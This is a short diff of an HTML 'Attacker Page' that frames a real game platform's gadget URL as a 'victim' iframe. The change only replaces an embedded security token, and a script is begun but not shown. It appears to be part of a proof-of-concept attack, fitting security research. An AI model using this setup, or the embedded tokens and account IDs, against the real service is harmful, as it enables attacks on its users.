--- a/63826187321312836671273721.html
+++ b/63826187321312836671273721.html
@@ -7,7 +7,7 @@
 <body>
   <h2>Attacker Page</h2>
 
-  <iframe id="victim" src="https://osapi.nutaku.com/gadgets/ifr?synd=nutaku&container=nutaku&country=US&lang=en&mid=1&owner=173250875&viewer=173250875&aid=267592&tid=demon-lords-career-change-x&view=canvas&parent=https%3A%2F%2Fwww.nutaku.net&noinfo=0&nocache=0&debug=1&view-params=&st=%2BrGfTW8Ww6S0L2kI9hhsHtomsEeSJgrrUynAVACnF3QQ3zseIvRP8Sr1I5%2BK5cNrje85Ya7Zac93YQVwGs%2B%2F6nKY7loIrtXKouX7sF0fox7xUlDzTGugDqzoP4lXTJeXIE9nxWuK1AMz6ujyS%2Fdj%2FGIbprsNQx%2BF1%2BhbiioKCkuUbt8yvY6HE5CQ%2BddocGzv58hOAyL5WfhmxpzLP5b2%2FL6kHleq6jnibcJCpswnymL72iNWsd5PLiu3ILtXlP2RqhX%2Fs0i33DK7mkrbvpYUfR4HPME%3D&domain=https%3A%2F%2Fwww.nutaku.net"></iframe>
+  <iframe id="victim" src="https://osapi.nutaku.com/gadgets/ifr?synd=nutaku&container=nutaku&country=US&lang=en&mid=1&owner=173250875&viewer=173250875&aid=267592&tid=demon-lords-career-change-x&view=canvas&parent=https%3A%2F%2Fwww.nutaku.net&noinfo=0&nocache=0&debug=1&view-params=&st=W5RdjsgLoDdyZJcRV%2BNIctLtDqpkM26RZiVOI6lK8pzC4MilqfruaP0qua7Z%2BhSQwJnADWDlAhN%2B87V9ndcqMOYc6bVx0dhpx1sSV7GQ1mcc%2BSV7j3jE45JhDMQMJsl5y0M3Hj7o1UBZbPzSHLBG89u%2Fh2vmXIPSbIhFhQz2is2j0RhTUiT8VfHI1vgAQcN8LTuQCNY4C%2Bf27T1fHC9CkiR%2FeYDuUO%2FUAaRHcO37hhYMILkgri9Sc6nRU9KxyOQZmmDud0G9zGQgpub8E0V8pbi4KLU%3D&domain=https%3A%2F%2Fwww.nutaku.net"></iframe>
 
   <script>
     // Wait until the iframe loads
